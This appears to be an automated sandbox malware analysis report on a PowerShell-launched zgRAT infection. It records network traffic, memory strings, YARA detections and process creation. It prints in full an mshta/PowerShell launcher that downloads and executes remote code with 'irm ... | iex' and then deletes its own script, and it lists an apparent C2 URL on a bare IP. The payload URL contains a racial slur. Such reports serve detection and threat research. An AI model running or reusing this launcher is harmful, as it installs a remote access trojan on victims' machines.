Source: global traffic	HTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hot7jan.blogspot.com
Source: global traffic	HTTP traffic detected: GET /!api/2.0/snippets/nippleskakulcha/xq8pnq/f9259294d6c36acaa3a405307dfd0b2eee933c4b/files/7jan.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET ///////nigger.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hot7jan.blogspot.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hot7jan.blogspot.com
Source: global traffic	HTTP traffic detected: GET /!api/2.0/snippets/nippleskakulcha/xq8pnq/f9259294d6c36acaa3a405307dfd0b2eee933c4b/files/7jan.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bitbucket.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET ///////nigger.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hot7jan.blogspot.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hot7jan.blogspot.com
Source: global traffic	HTTP traffic detected: GET /!api/2.0/snippets/nippleskakulcha/xq8pnq/f9259294d6c36acaa3a405307dfd0b2eee933c4b/files/7jan.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET ///////nigger.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hot7jan.blogspot.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hot7jan.blogspot.com
Source: global traffic	HTTP traffic detected: GET /!api/2.0/snippets/nippleskakulcha/xq8pnq/f9259294d6c36acaa3a405307dfd0b2eee933c4b/files/7jan.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bitbucket.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: hot7jan.blogspot.com
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org

Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bitbucket.org
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://blogspot.l.googleusercontent.com
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hot7jan.blogspot.com
Source: powershell.exe, 00000000.00000002.3064090133.0000026C4AABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2633925451.0000026C398C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2637107952.00000259BE961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.11.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: fontdrvhost.exe, 00000010.00000002.2425796582.00000000030AC000.00000004.00000010.00020000.00000000.sdmp, fontdrvhost.exe, 00000011.00000002.2383025146.00000000030AD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlf
Source: fontdrvhost.exe, 00000011.00000002.2383025146.00000000030AD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlf?
Source: fontdrvhost.exe, 00000010.00000002.2425796582.00000000030AC000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlfx
Source: powershell.exe, 00000000.00000002.2633925451.0000026C398C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2637107952.00000259BE961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2504000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A251D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: powershell.exe, 00000013.00000002.2637107952.00000259BECB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org
Source: powershell.exe, 00000013.00000002.2637107952.00000259BEB82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2637107952.00000259BECB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: powershell.exe, 00000000.00000002.3064090133.0000026C4AABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.3064090133.0000026C4AABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.3064090133.0000026C4AABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A29D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000013.00000002.2637107952.00000259BEB82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A29D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hot7jan.blogspot.com
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A29D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hot7jan.blogspot.com///////nigger.pdf
Source: mshta.exe, 0000001C.00000003.2650742069.000001CC25CD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hot7jan.blogspot.com///////nigger.pdf)
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A298A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hot7jan.blogspot.com///////nigger.pdfX
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hot7jan.blogspot.com/atom.xml
Source: powershell.exe, 00000000.00000002.3064090133.0000026C4AABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867

Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49964 version: TLS 1.2

Source: fontdrvhost.exe, 00000010.00000003.2388490985.0000000005780000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_cadc4cbf-e

Source: fontdrvhost.exe, 00000010.00000003.2388490985.0000000005780000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_8d5c64fb-b

Source: Yara match	File source: 16.3.fontdrvhost.exe.59a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.fontdrvhost.exe.5780000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.fontdrvhost.exe.5780000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.fontdrvhost.exe.5780000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000003.2388490985.0000000005780000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2390559087.00000000059A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 5808, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

Matched rule: Detects zgRAT Author: ditekSHen

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C754E0 NtQuerySystemInformation,malloc,NtQuerySystemInformation,GetCurrentProcess,GetCurrentProcess,memset,RtlGetVersion,GetCurrentProcess,OpenProcess,CloseHandle,lstrcmpiW,OpenProcess,CloseHandle,free,	5_2_05C754E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7B28B GetCurrentProcess,NtQueryInformationProcess,	5_2_05C7B28B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C751A4 NtQueryInformationProcess,	5_2_05C751A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C77754 GetProcAddress,NtQuerySystemInformation,malloc,NtQuerySystemInformation,GetCurrentProcess,OpenProcess,GetProcessImageFileNameW,K32GetProcessImageFileNameW,CloseHandle,free,	5_2_05C77754
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C774D3 GetModuleFileNameW,RtlInitUnicodeString,NtOpenFile,	5_2_05C774D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C773ED IsBadReadPtr,malloc,GetCurrentProcess,NtUnmapViewOfSection,VirtualAlloc,GetLastError,NtSetInformationFile,Sleep,free,NtClose,	5_2_05C773ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C788F1 NtQueryInformationProcess,	5_2_05C788F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA3134 NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,	5_2_05CA3134

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0196A048	5_2_0196A048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0196A038	5_2_0196A038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01965D90	5_2_01965D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01965DC0	5_2_01965DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C78E79	5_2_05C78E79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C73000	5_2_05C73000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7440E	5_2_05C7440E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7AC20	5_2_05C7AC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA3FD2	5_2_05CA3FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0652A070	5_2_0652A070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_028AA048	6_2_028AA048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_028A3A5C	6_2_028A3A5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_028AA038	6_2_028AA038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_028A1F14	6_2_028A1F14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_028A5D90	6_2_028A5D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_028A5DC0	6_2_028A5DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_05CDA070	6_2_05CDA070

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 912

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Source: classification engine

Classification label: mal100.troj.evad.winPS1@36/26@2/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-7033c19e-5841-2ad059-6fd8187c45ce}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i42zfsns.u22.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\atomxml.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 912
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 784
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 916
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "javascript:vje=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(vje[2])[vje[0]](vje[1], 0, true);close();vfx=new ActiveXObject('Scripting.FileSystemObject');vfx.DeleteFile(WScript.ScriptFullName);"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" "javascript:epd=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSyste
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "javascript:vje=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(vje[2])[vje[0]](vje[1], 0, true);close();vfx=new ActiveXObject('Scripting.FileSystemObject');vfx.DeleteFile(WScript.ScriptFullName);"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" "javascript:epd=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSyste
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 912	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 916	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 784	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 788	Jump to behavior
